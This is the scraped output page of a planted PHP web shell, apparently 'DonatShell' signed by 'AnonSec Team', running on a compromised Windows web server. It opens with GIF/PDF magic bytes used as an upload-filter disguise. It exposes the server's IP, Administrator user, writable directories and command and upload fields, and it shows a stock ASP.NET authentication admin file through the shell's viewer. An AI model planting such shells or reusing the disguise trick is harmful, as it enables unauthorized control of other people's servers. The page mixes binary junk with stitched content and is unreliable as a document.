GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Windows/Microsoft.NET/Framework/v4.0.30319/ASP.NETWebAdminFiles/Security/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /Windows/Microsoft.NET/Framework/v4.0.30319/ASP.NETWebAdminFiles/Security/setUpAuthentication.aspx
<%@ Page masterPageFile="~/WebAdminButtonRow.master" trace="false" inherits="System.Web.Administration.SecurityPage"%>
<%@ Import Namespace="System.Web.Configuration" %>

<script runat="server" language="cs">
public void Page_Load() {
    if (!IsPostBack) {
        Configuration config = OpenWebConfiguration(ApplicationPath);
        AuthenticationSection auth = (AuthenticationSection) config.GetSection("system.web/authentication");
        if (auth.Mode == AuthenticationMode.Windows) {
            fromInternet.Checked = false;
            fromNetwork.Checked = true;
        }
    }
}

public void UpdateAndReturnToPreviousPage(object sender, EventArgs e) {
    Configuration config = OpenWebConfiguration(ApplicationPath);
    AuthenticationSection auth = (AuthenticationSection) config.GetSection("system.web/authentication");
    auth.Mode = fromInternet.Checked ? AuthenticationMode.Forms : AuthenticationMode.Windows;
    SaveConfig(config);
    Response.Write(auth.Mode);
    ReturnToPreviousPage(sender, e);
}

</script>
<asp:content runat="server" contentplaceholderid="titleBar"/>

<asp:content runat="server" contentplaceholderid="buttons">
    <asp:button ValidationGroup="none" runat="server" id="button1" text="<%$ Resources:DoneButton %>" onclick="UpdateAndReturnToPreviousPage"/>
</asp:content>

<asp:content runat="server" contentplaceholderid="content">
<asp:literal runat="server" text="<%$ Resources: HowWillUsersAccess %>"/>
<br/>
<br/>
<table width="62%">
    <tr>
        <td><asp:radioButton runat="server" id="fromInternet" groupName="auth" checked="true" /></td>
        <td class="bodyTextNoPadding">
            <asp:label runat="server" associatedcontrolid="fromInternet" font-bold="true" text="<%$ Resources:FromInternet %>"/>
        </td>
    </tr>
    <tr>
        <td>
        </td>
        <td class="bodyTextNoPadding">
        <asp:literal runat="server" text="<%$ Resources: InternetExplanation %>"/>        
        </td>
    </tr>
    <tr>
        <td><asp:radioButton runat="server" id="fromNetwork" type="radio" groupName="auth"/></td>
        <td class="bodyTextNoPadding">
            <asp:label runat="server" associatedcontrolid="fromNetwork" font-bold="true" text="<%$ Resources:FromNetwork %>"></asp:label>
        </td>
    </tr>
    <tr>
        <td>
        </td>
        <td class="bodyTextNoPadding">
        <asp:literal runat="server" text="<%$ Resources: NetworkExplanation %>"/>        
        </td>
    </tr>
</table>
</asp:content>


Anon7 - 2022
AnonSec Team